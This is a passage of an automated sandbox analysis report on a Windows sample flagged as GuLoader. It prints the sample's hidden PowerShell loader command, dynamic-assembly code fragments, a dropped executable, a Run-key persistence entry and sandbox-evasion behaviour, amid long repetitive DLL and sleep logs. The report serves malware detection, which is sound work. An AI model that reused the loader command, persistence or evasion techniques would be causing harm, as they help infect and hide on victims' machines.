Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Torpernes.exe

Static file information: File size 1283968 > 1048576

Source: Torpernes.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ore.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006D84000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2181416185.0000000009DFB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Nedtllingers $Prfabrikationernes $Frugtbarhedsguden), (gongs @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sanction = [AppDomain]::CurrentDomain.GetAssem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($manubaliste)), $Celluloidensonnering).DefineDynamicModule($Bairnteam, $false).DefineType($Kobjlde, $Receptionschefer, [System.Multicas

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Torpernes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
Source: C:\Users\user\Desktop\Torpernes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_00406183 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406183

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_3_001949CC push eax; iretd	6_3_001949CD
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB2890 push eax; retf	6_2_20CB2891
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB69A3 push 331320CBh; retf	6_2_20CB69B2
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6AC3 pushad ; retf	6_2_20CB6AC6
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6AE9 push 687F20CBh; retf	6_2_20CB6AEE
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A89 push eax; retf	6_2_20CB6A8A
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A8F push edx; retf	6_2_20CB6A92
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A8D push eax; retf	6_2_20CB6A8E
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A9B push esi; retf	6_2_20CB6A9E
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A93 push esi; retf	6_2_20CB6A9A
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6AA1 push edi; retf	6_2_20CB6AA2
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A68 push 00000048h; retf	6_2_20CB6A6A
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB1FBF push ds; retf	6_2_20CB1FC2
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB2F00 pushad ; iretd	6_2_20CB2F01

Drops PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Contentious.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run crisscrossing			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run crisscrossing			Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

API/Special instruction interceptor: Address: 2D88B49

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Memory allocated: 20DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Memory allocated: 20990000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599771	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599652	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599534	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599401	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598947	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598837	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598117	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597774	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597434	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597101	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596327	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596102	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595872	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595764	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595655	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595348	Jump to behavior
